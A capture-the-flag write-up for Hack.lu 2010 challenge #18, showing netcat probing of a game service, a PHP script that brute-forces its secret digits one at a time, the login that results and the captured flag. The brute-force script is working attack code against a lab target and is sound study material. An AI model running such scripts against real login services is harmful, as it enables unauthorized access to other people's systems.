Hack.lu 2010 CTF Challenge #18 Writeup

Digital Treasure Chest (300)
You were asked to pentest the 1.1 beta-version of the digital treasure chest.
Finding an authentication bypass appears to be trivial to you.
pirates.fluxfingers.net 6969/tcp

$ nc pirates.fluxfingers.net 6969
010 WELCOME. Please Enter your secret digits
0
555 Wrong credentials

If we try some more numbers, we will get:

$ nc pirates.fluxfingers.net 6969
010 WELCOME. Please Enter your secret digits
9
011 Continue
5
555 Wrong credentials

Easy to guess, we are wanted to bruteforce secret digits, one by one (not the whole number). Here is a simple php script for that:

<?php

    $key = "";
    while (1) {
        for ($i = 0; $i < 10; $i++) {
            $f = fsockopen("pirates.fluxfingers.net", "6969");
            fgets($f);
            fwrite($f, "$key$i\n");
            $s = fgets($f);
            if (strpos($s, "011") !== false) {
                $key .= $i;
                echo $i;
                break;
            }
            if (strpos($s, "555") === false) {
                echo "\nSTRANGE ANSWER (key={$key}{$i}): $s\n";
                die();
            }
        }
    }
   
?>

Running it:

$ php pwn.php 
9200372140803765602
STRANGE ANSWER (key=92003721408037656022): 100 Login successful

$ nc pirates.fluxfingers.net 6969
010 WELCOME. Please Enter your secret digits
92003721408037656022
100 Login successful
help
310 Command listing

version     (show version number)
list        (list treasure chests)
show N      (show content Nth chest)
empty       (empty the Nth chest - not available yet)
fill N M    (fill Nth chest with M gold - not available yet)
quit        (quit)

list
310 Listing chests:

1) DTCE Monthly Newsletter
2) damn secret
3) Welcome to our Digital Treasure Chest Enterprise

show 2
310 ---------------
 damn yer those bloody royal guards. I just want my rrrrum!
also, the Key is 'f00k1namaZ!ng'

Funny: A pirate does not "go shopping". Unless by "shopping", you mean "killing". 
---------------

The flag: f00k1namaZ!ng

1 comment

    • FluxChosi on October 30, 2010 at 18:32
    • Reply

    Thanks for the writeup!

Leave a Reply

Your email address will not be published.